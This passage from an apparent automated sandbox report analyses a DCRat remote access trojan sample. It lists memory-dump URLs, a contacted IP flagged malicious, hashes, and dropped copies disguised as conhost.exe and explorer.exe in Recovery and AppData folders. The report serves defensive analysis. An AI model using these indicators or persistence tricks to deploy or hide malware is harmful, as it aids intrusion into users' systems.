00000029.00000002.2519181571.0000029980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BE8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18B931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2599532869.0000018C35992000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2499619522.000001B700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE673FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBBA87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760AC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B22506C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.000002800022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE34A20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2519181571.0000029980230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BEAE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2599532869.0000018C35BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCPNSQusnwC.exe, 00000000.00000002.2187273865.000000000329B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2499619522.000001B700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE67101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBB861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760A9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B224D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.0000028000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE347F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2519181571.0000029980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BE8B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18B931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11811000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2499619522.000001B700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2582821634.000001DE673FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2571999490.000001EBBBA87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2568713270.0000023B4B288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2504978673.000001F580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2549467130.000002760AC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2505402437.0000014C00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2594707464.0000022A1A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2433434759.00000242BD48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2547724474.000001B22506C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2503362937.000002800022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2499675027.000001DE00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2518605945.000001D000230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2519047385.000001C380230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2598289772.000001EC88F40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2596223071.000001FE34A20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2519181571.0000029980230000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2594741199.000001F5BEAE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2610703257.000001E18BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2597071261.000001BB11A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2599532869.0000018C35BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  45.88.91.89
                                  		unknownBulgaria
                                  		10753LVLT-10753UStrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1574710
                                  Start date and time:2024-12-13 14:31:16 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 10m 55s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:60
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:CPNSQusnwC.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:A26ED7DC21BC77F20C0251FA25738D02.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@82/143@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: CPNSQusnwC.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  08:32:16API Interceptor696x Sleep call for process: powershell.exe modified
                                  08:32:37API Interceptor2285642x Sleep call for process: explorer.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  LVLT-10753USb3astmode.sh4.elfGet hashmaliciousMiraiBrowse
                                  • 147.3.223.242
                                  jade.m68k.elfGet hashmaliciousMiraiBrowse
                                  • 94.154.174.147
                                  jade.mips.elfGet hashmaliciousMiraiBrowse
                                  • 64.8.51.71
                                  jade.spc.elfGet hashmaliciousMiraiBrowse
                                  • 94.154.174.107
                                  file.exeGet hashmaliciousUnknownBrowse
                                  • 94.154.172.218
                                  jew.arm.elfGet hashmaliciousUnknownBrowse
                                  • 148.57.27.159
                                  Needed Aircraft PN#_Desc_&_Qty Details.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                  • 45.88.88.7
                                  Turbo Generator_Pictures & Drawing.vbsGet hashmaliciousUnknownBrowse
                                  • 45.88.88.7
                                  Payment Remittance Advice Details.vbsGet hashmaliciousUnknownBrowse
                                  • 45.88.88.7
                                  List of Required PN#_Desc_&_Qty Details.vbsGet hashmaliciousUnknownBrowse
                                  • 45.88.88.7

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\Desktop\AxLDtRxd.log0wdppTE7Op.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      xoCq1tvPcm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        Dfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          KyC6hVwU8Z.exeGet hashmaliciousDCRatBrowse
                                            4si9noTBNw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              eu6OEBpBCI.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                IYXE4Uz61k.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                  file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                    FToZAUe1tw.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                      Created / dropped Files

                                                      C:\Recovery\088424020bedd6

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):265
                                                      Entropy (8bit):5.773816398795534
                                                      Encrypted:false
                                                      SSDEEP:6:m+nDurKq2O9jwImgSG/yMVAPkD7VsfPD3pQO95Txn:m+nKh7l3mXGaMqPKxsfPD3WOF
                                                      MD5:49BFAA1E17944A830C1430A6486C9ABF
                                                      SHA1:C37CA52F5B41199BC8687533FEF90088BD90C78E
                                                      SHA-256:033EFFBCF9E880CC9C71870FA0573D9C994E1F92D807261E38F5AC50FAB8DB4E
                                                      SHA-512:0739034C78F6C8DB94A1A7F0AFFEB33D490E6A039446E3A1F3B2E66C7679E7D0940324B913907CD2817F6EAF0D011B4684C27CAD4707ECC8B9F41B382E6B7A58
                                                      Malicious:false
                                                      Preview:7agybhaDS5nQQjhcnmlkf1Ybj1uz5bnYfi6Kdli8MlUBqPo6nvq1SsuFBFOjwkH1ROvrmW9CEnY3gXuUNyMJuwGwx1JXW8Llddtbe6TQwowoU1ioU4W8Y7GfI83vNlqFcwZDnS0Qe5XG9bc6SeDclMNgWOTfCiDL8rMhbeBCDFeckAfrf6dtiNdQi3qY9VO52LISO4fxdBYgrv5Wtl9GEUnuN68hymCs1ijZ1NckbpPhz7ix8TpYVH1iiXFS67918poIMfefJ

                                                      C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@.................................<.(.O.....(.p.....................)...................................................... ............... ..H............text.....(.. ....(................. ..`.rsrc...p.....(.......(.............@..@.reloc........).......(.............@..B................p.(.....H.............$.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                      C:\Recovery\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Recovery\conhost.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@.................................<.(.O.....(.p.....................)...................................................... ............... ..H............text.....(.. ....(................. ..`.rsrc...p.....(.......(.............@..@.reloc........).......(.............@..B................p.(.....H.............$.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                      C:\Recovery\conhost.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Recovery\ff48ed721f85bb

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with very long lines (925), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):925
                                                      Entropy (8bit):5.908330184990282
                                                      Encrypted:false
                                                      SSDEEP:24:tKSU096pkpNdNKlq+RJAuHlKrtUyJBC9ZqV3MXx6q4:tKSU0SkpDAJbLHwraQB+EZMXO
                                                      MD5:990DE2CA3EDF2949FF074F503008F92E
                                                      SHA1:B3EF01EFC6E075B42D2EFC653F0C7231176DAF3D
                                                      SHA-256:4C24FA304E9F7D37F52CFB777FA781C1A8F20FFEA001328F076FC4DBEC065085
                                                      SHA-512:565680EE91AA754C45FEC51E8C17B4B6158F7124982DEA6D1E8275CC7EEAC8BE3CC3D4DB20278C07A86DFCD687C75430928CE6AAC7B0C9D536528AAFB5CF4BB0
                                                      Malicious:false
                                                      Preview:PXLje6oXtrA1eHJodqYiJTalczJP6dbeccz5uYe4US5aLoAY9uLtphw67kGpwZaQQgYBRO4ELdO0Y9axyvPMRsy4q37KSzH41oKoP8Gu0HhLT5h7JS0AJO9hseVYQtvVWT8tyvhzpfWJKmkuVAA99Gvnpm6vnsdGVLzA7yIYuAVn2zWF3lCQsvWPhUEMywM7CPy8wkwh1mP8vHv0P11CpMXjzkcmu6j7yYlmAXSTyeZGgYdZjN674KRz1OJMHKx4CRJXgJz2iiNLxRDaGDDgAlDnGvuwOGLoreEPOG3ZYEZW6GCkLsFEGQ4aOfQvYDncWjdSNyM9JnI6MqrAsKlfAHhaknAszIBVa7AXnuXXgF4cI7OhyQCNcIbPBCrjxdKBmwgPqTX8xN84MESmZd3jFx2RfuVkCxjD520Vb90f3DaOKhC7uFKUjk5y3Ot58w69o48TN6KamYpCXoG8sX06nPeV6CbNP5gGGbkPistx4usK43bPHuNk6AWYanXLe7Kq2i66E1Z9oCB3hTaDlMFfr5KGELz5VhT7jBSV7fKQUN638c1HNTkS1p96Y013BeoGtETgBEGFCyKe9RHlTrrB7AF4CV7HnQO0jzJ3JVFJNePCee6GsPjTxmIs8ZdpG9cvkU5KHNc8miyduCZhY1YYq4C6qa5u1ZCOCecKiw8ewlrOyp7596RPkDEpR9drSsGMfkaQkP8m24lFMyIBc9u5Ixn8ax3jTRLEefsNOrVu7oWqc9cd0cOT7LDs6czxWYTlsgkrF4wvnA7eb7gbUat0D2GScARw1iYiVv85YvX6qcp7OjQ95Yc6pchzaRPEn93FlYIq8lCjCwKkMJE2uR1cFc32NIfHgSTqikVzakAUW333S7nQMWUVIa9JfPc0F5DtddBlxOcJRgGMi9kQfO4K88iHlLULH

                                                      C:\Users\Default\AppData\Roaming\Microsoft\7a0fd90576e088

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with very long lines (457), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):457
                                                      Entropy (8bit):5.815659140813917
                                                      Encrypted:false
                                                      SSDEEP:12:mPq8170/ydtWB1j0dAr/ZiTuurUphdPZ0k0YVZvBU+r2IiJ:mPh70yd8r0eE41p0GB5r2b
                                                      MD5:9EA858B00D4615F401524467C0ED1D4C
                                                      SHA1:88B87D5E9F212364D73FFD6F580B841F79107E41
                                                      SHA-256:AEFEE1F5F663AC0D96E7CE13DE128F00235A05D818682DC2EF0AAD53E5215BAD
                                                      SHA-512:5DD5B48D80275D99B38EB5596322F791DB2819001B87011849420EA04A6F427E320AF4DE7F7A7B134CAD0DEFBB1C08EEA4B71073F9F21A6A5405A5F4C71E2DA7
                                                      Malicious:false
                                                      Preview:oBFX28gQYNDduXBoYIEELjsVemnlAvT1QihcZIvG1ttJiMaTtK04wZQESu3PV5Qm4MMLzjPPW8MczjwSMT105ZE1ScJpPgu6dGPW9OdJ4liyMyOt7lCCDZreHU3Xak9zOQ8tTZS8zr5U1QpeNZrods2DYuOpUGtUlsj5zfaiTDMVeXn1pZJA2VWgX4UjLnot8ltIqtos9JVZfhjBGW956tbPWDi4K1XqZcX2oeL5ubBtA6AzVTcynsxPJdwmLuhIwoADKqWlLELerrOZDsj1YiCrpIsKriu9437V66po60mihShcOXjcLptNlSXB8L4nTLkxu3dGC45i6eJXkQ6U9RyPKttnjnqu68OVstrV3cZQuKQHJAbrPjoCXVnAJ0hZOKm7Pyp0ikbg2he9cleiM8fWUM8WGrLD4ABjiT2UVkIoIHKz0ohhW8MPpPmCzSu1YYl1f4aJt

                                                      C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@.................................<.(.O.....(.p.....................)...................................................... ............... ..H............text.....(.. ....(................. ..`.rsrc...p.....(.......(.............@..@.reloc........).......(.............@..B................p.(.....H.............$.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                      C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):2670080
                                                      Entropy (8bit):4.629619443814358
                                                      Encrypted:false
                                                      SSDEEP:24576:eRDNakc4BcCw7sUL/4cIG5IuUe1QdcqTHmdbBs3eJCZrCsjOEKka+wlFlett6t1:yDNu4BaMcQmQmqyHM6sslnE
                                                      MD5:A26ED7DC21BC77F20C0251FA25738D02
                                                      SHA1:8FC82929941D67A20C76976E796FEAB701795C2F
                                                      SHA-256:18E83D9FABE142A751C644F12D223E6C4825912573A352551361ABDE977D753F
                                                      SHA-512:5E8044FD8E78AAD306D8FFD3B3BBC6583CC353C8CDDDA1A15B05A22FCF7815A770482418BDB120C679F784017741E36C87AA5BB053008CC94FE9560B97366838
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......(...........(.. ....(...@.. ....................... ).....>J)...@.................................<.(.O.....(.p.....................)...................................................... ............... ..H............text.....(.. ....(................. ..`.rsrc...p.....(.......(.............@..@.reloc........).......(.............@..B................p.(.....H.............$.........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                      C:\Users\Public\Desktop\HtDnYdcmRwFqJHFiJLDuUHlLZGZSd.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\Public\Desktop\ff48ed721f85bb

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
